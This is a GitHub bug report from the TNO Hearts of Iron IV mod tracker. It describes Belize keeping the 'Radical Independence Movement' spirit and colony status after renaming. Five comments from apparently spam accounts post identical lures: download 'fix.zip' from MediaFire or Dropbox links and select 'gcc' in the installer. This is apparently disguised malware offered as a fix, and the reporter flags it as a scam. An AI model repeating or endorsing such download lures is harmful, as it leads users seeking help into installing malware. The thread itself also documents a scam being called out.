### ISSUE TITLE
BLZ - Some issues for Belize after it changed from British Honduras

### ISSUE THREAD

**Issue by Ikidikid** [TNODevs/TNO-Bug-Tracker#3568]
### Operating System

Windows 10 Enterprise

### HOI4 version

1.14.7

### TNO version

1.6.0

### Do you have other mods in use?

None

### Were you using Steam?

Yes

### Which major expansions do you NOT have?

I have all

### Files

[USA_play.zip](https://github.com/user-attachments/files/16742392/USA_play.zip)

### Describe the bug

When British Honduras has changed into Belize and its flag, the 'Radical Independence Movement' national spirit is not removed and its puppet status is still a 'Colony' instead of different autonomy puppet status like 'Client State' for example. 

### Steps to reproduce / Cause of the issue

1. Play through 1972's
2. British Honduras changed to Belize.

### Expected behaviour

I don't know.

### Screenshots

![Image_1](https://github.com/user-attachments/assets/f88956b0-2e6f-49a5-bd1b-abba943847c5)

![Image_2](https://github.com/user-attachments/assets/ab42f12a-0138-4358-8380-2343c6499abd)

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Ikidikid** [comment]
[runelead00](https://github.com/runelead00) Please, delete these scam comments.

**Comment by Stormeagle449** [comment]
Fixed in Dev Build.
